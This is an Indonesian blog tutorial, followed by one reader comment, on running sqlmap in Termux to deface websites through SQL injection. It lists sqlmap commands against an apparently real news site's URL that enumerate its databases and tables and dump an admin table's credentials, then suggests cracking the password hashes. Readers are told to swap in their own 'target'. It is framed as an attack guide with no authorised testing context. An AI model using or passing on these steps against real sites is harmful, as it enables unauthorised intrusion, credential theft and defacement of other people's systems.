Pada artikel kali ini saya akan memberikan tutorial cara pakai sqlmap di termux. sqlmap adalah tool yg digunakan untuk melakukan deface pada sebuah website dengan metode SQL Injection. Jika kalian belum menginstall sqlmap di termux, maka baca artikel sebelumnya
Baiklah sekarang kita mulai tutorialnya
Bahan :
1. Android Minimal OS Lolipop
2. Termux Xbzvej
3. Target vuln
Bahan :
1. Android Minimal OS Lolipop
2. Termux Xbzvej
3. Target vuln
Setelah semua bahan telah ada kita ke langkah selanjutnya yaitu cara deface menggunakan sqlmap di termux.
- Buka termux xbizvej
- Pindah ke directory sqlmap
- Masukan perintah
- Tunggu hingga prosesnya selesai
- Sekarang kita lihat tablenya dengan memasukan perintah
- Cari table yg berhubungan dengan admin atau user dan masukan perintah
- setelah dapat selanjutnya di dump dengan petintah
$ cd sqlmap
$ python2 sqlmap.py -u http://www.jmtv.com/news.php?id=3 --dbs
$ python2 sqlmap.py -u http://www.jmtv.com/news.php?id=3 -D jm_tv --tables
$ python2 sqlmap.py -u http://www.jmtv.com/news.php?id=3 -D jm_tv -T admin_jmtv --columns
$ python2 sqlmap.py -u http://www.jmtv.com/news.php?id=3 -D jm_tv -T admin_jmtv --dumpNote : http://www.jmtv,com/news.php?id=3 (diganti dengan web target kalian)
Selanjutnya tinggal meng hash password nya ( apabila passwordnya di encrypt)
macam mana nak hash kan password
BalasHapus